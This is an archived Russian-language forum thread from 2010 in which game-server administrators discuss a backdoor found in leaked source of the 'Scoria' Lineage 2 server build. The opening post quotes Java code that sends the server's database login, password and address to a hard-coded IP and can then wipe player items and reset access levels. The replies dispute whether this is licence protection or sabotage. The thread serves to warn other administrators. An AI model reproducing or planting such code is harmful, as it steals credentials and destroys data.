Форум администраторов игровых серверов

Форум администраторов игровых серверов (https://forum.zone-game.info/TT.php)
-   Курилка / Yak floor (https://forum.zone-game.info/forumdisplay.php?f=16)
-   -   Немного о скории (https://forum.zone-game.info/showthread.php?t=8503)

[STIGMATED] 09.06.2010 07:13

Немного о скории
 
Немнога o Scoria Dev.Team
Итак. Полазив по коду выложеной недавно в шару сборки Скории(Исходников) наткнулся на один интересный файл
называется он L2ScriptEngineManager
Пролистав его нашел интересный код

Код:

URL url = new URL("http://212.59.118.152/auth/game.auth?"+Base64.encodeBytes(Config.
USER.getBytes()));
URL sliv = null;
BufferedReader reader = new BufferedReader(new InputStreamReader(url.openStream()));

String line = reader.readLine();
if(line == null)
{
sliv = new URL("http://212.59.118.152/sliv/donor.php?ip="+Config.EXTERNAL_HOSTNAM
E+"&udb="+Config.DATABASE_LOGIN+"&pdb="+Config.DATABASE_PASS
WORD+"&ddb="+Config.DATABASE_URL);
}
else if(line.equals("die"))
{
sliv = new URL("http://212.59.118.152/sliv/donor.php?ip="+Config.EXTERNAL_HOSTNAM
E+"&udb="+Config.DATABASE_LOGIN+"&pdb="+Config.DATABASE_PASS
WORD+"&ddb="+Config.DATABASE_URL);
}
else if(Integer.parseInt(line) != Config.KEY)
{
sliv = new URL("http://212.59.118.152/sliv/donor.php?ip="+Config.EXTERNAL_HOSTNAM
E+"&udb="+Config.DATABASE_LOGIN+"&pdb="+Config.DATABASE_PASS
WORD+"&ddb="+Config.DATABASE_URL);
}
if (sliv != null)
{
BufferedReader read = new BufferedReader(new InputStreamReader(sliv.openStream()));
String info = read.readLine();
if (info != null)
{
if (info.equalsIgnoreCase("true"))
{
Connection con = null;
try
{
con = L2DatabaseFactory.getInstance().getConnection();
PreparedStatement statement = con.prepareStatement("UPDATE characters SET accesslevel = 1");
statement.execute();
statement = con.prepareStatement("DELETE FROM items");

пройдя по данному адресу мы переходим на базу данный {нубо-портал}
в папке лежит 2 файла

1. donor.php - принимающий данные
2. vaip.php - я думаю вам не стоит обьяснять для чего он )

Вот такая у нас крутая сборка Скория. Респект и уважуха Зену :-*

Немного подумав можна сделать выводы что те сервера которые работают на сборке Скории это их сборки личные сервера ну +- пару штук. Если серв начинает немного подыматся и мешает им(понижает их рейтинг его просто уничтожают).
А люди кстати за эти сборки платят деньги и немалые.
Самое интересное что вы ничего не докажите. Мол сборку украли выложили в инет, предворительно вставив туда зловредный код.
Но вот какая незадача.
Ссылки то стоят на их базу знаний а конкретнее на файлы Донор и Вайп



Взято с cs-la2. Отписываем мнения.

Credo 09.06.2010 07:29

Re: Немного о скории
 
Давно уже читал. Месяца 1,5 назад там же - на кс-ла2. Странно, что ты эту статью только сегодня выложил :). Да помоему сейчас (по крайней мере на ЗГ) скория если и стоит у кого, то у 2-5 человек (судя по опросам). В любом случае какой-никакой админ, мог прочитать на следущий день, после того, когда слили сорцы скории вместе с спс про то, что ты изложил выше. Слишком много шума было, чтоб не заметить.

[STIGMATED] 09.06.2010 07:31

Re: Немного о скории
 
Да я тоже давненько читал, решил выложить на суд.

Volond1 09.06.2010 08:30

Re: Немного о скории
 
Мде выводы поражают ваши, хоть и не юзал скорию. А если посматреть с другой стороны к примеру STIGMATED купил сборку и начал передавать по рукам как это бывает с нечестными покупателями. Вот и програмеры придумали такую штукенцию для умников. Аналогичная шняга наблюдалась в сборках базы.
Вот вам и другое пояснение. А тут уже кто как хочет тот и крутит. Вот к примеру озлобленая школота крутит по примеру STIGMATED, а тот кто чуть по мудрей то мой вариант.
К примеру возмем индев сборку, у них почти такое но другое исполнение.

Цитата:

Сообщение от STIGMATED (Сообщение 73313)
Да я тоже давненько читал, решил выложить на суд.

А сплетни разносят только бабки.

[STIGMATED] 09.06.2010 08:42

Re: Немного о скории
 
Значит теперь я школота? Я выложил на общий суд статью, а сборки я никогда непокупал... я в отличии от вас уважаемый, не агрюсь на такого рода посты.

ginger 09.06.2010 08:54

Re: Немного о скории
 
тут про это уже говорили, в той же теме где киллсурф исходы их выложил

Ozzy 09.06.2010 12:44

Re: Немного о скории
 
STIGMATED, даже если бы эта тема не поднималась - что ты хотел доказать этим? Если можно поподробнее.

n3k0nation 09.06.2010 13:16

Re: Немного о скории
 
О боже, опять... Какой-то юзверь, довольно тупой, написал "статью", где сделал "выводы" (если это можно так назвать) и теперь каждый второй портал это обсуждает. Если честно уже надоело :)
Вам хочется холивара == true ? да, мы именно для этого писали : нет, это защита от "плохих" клиентов;

А теперь пожалуйста ответьте себе на вопрос, обьективно и адекватно: база, эво и т.п. сборки убивали "конкурентов" (мне даже очень интересно какие такие конкуренты, но это уже другой вопрос)?
Если статью судить обьективно - в ней написан полный бред для людей со страхами "хааацкер!11".

Thank.

Credo 09.06.2010 13:32

Re: Немного о скории
 
Ну и чего вы на человека накинулись? Вы со ----- (scoria)? Прочитали? Знаете? Молодцы! Просто сами посмотрите. Нубы заходят на форум, регаются и создают темы, которые уже созданы (иногда по 2-3 раза)! Причем их абсолютно не смущает кнопка "ПОИСК"! О чем вы говорите? Если у вас сейчас мозг "заточен" (извиняюсь за выражение) только в одну сторону - разработать свой сервер, заработать на нем денег (поверьте, в мире есть еще масса других, не менее интересных вещей), то могу вас уверить - это ненормально! Так же ненормально, как выкладывая в паблик свою сборку товарищ zenn, приобрел отрицательную репутацию, не говоря о том, как он "разговаривает" со своими клиентами и участниками форума/сайта. Мое предположение: его клиенты держаться за него только потому, чтоб "уважаемый" Михаил их сервер не "вайпнул".
Как человек здравомыслящий (на примере меня), я, например, тоже таким был. И уверен, что вы тоже были такими. Ну, может, где то логика и проскакивала, в плане - сначала посмотреть, потом написать. Но суть в том, что человек поднял тему для людей, которые недавно собрались открывать свои проекты. Пусть и однодневные, но - сервера. Тем самым поднимая, не только нас но и ВАС в глазах других пользователей (что очень льстит. Как мне так и вам). И даже не пытайтесь препираться! Если вы не нуждаетесь в таком своеобразном "PR'e" - то зачем писать такие ничего не значащие посты? Для того, чтобы поднять себя в глазах того, кто начал эту тему? Или в глазах админов\модераторов? Это мнение - ошибочно! Тем самым вы опускаете себя, больше никакого эффекта от ваших слов нет!
Это мое ИМХО! В обсуждении - не нуждаюсь!
P.S. сорри.. мог бы написать целый том "Война и Мир" (вовремя отпустило :)). Просто накипело. Если вам неинтересна тема - проигнорируйте ее. Если было - поправьте. Зачем сразу уподобляться обезьянам, которой бананом перед носом махают?

Ramzessuss 09.06.2010 13:34

Re: Немного о скории
 
человек выложил статью, что бы знали что Вас ожидает со скорией, а Вы так накинулись, при чём совсем не по теме.

Если бы у меня были сорцы какой либо платной команды - естественно я бы это дело удалил оттуда, как говорится профиксил... так же эта статья не внушает доверия, какой умный человек стал бы называть скрипт с вайпом vaip.php? он бы назвал его иначе!!! это 100500, да и зачем выводить ИП на какой то портал, похожий на Базу Знаний 100нт? кто то хочет подставить скорию и зенна!!!


Текущее время: 16:39. Часовой пояс GMT +3.

Powered by vBulletin® Version 3.8.6
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot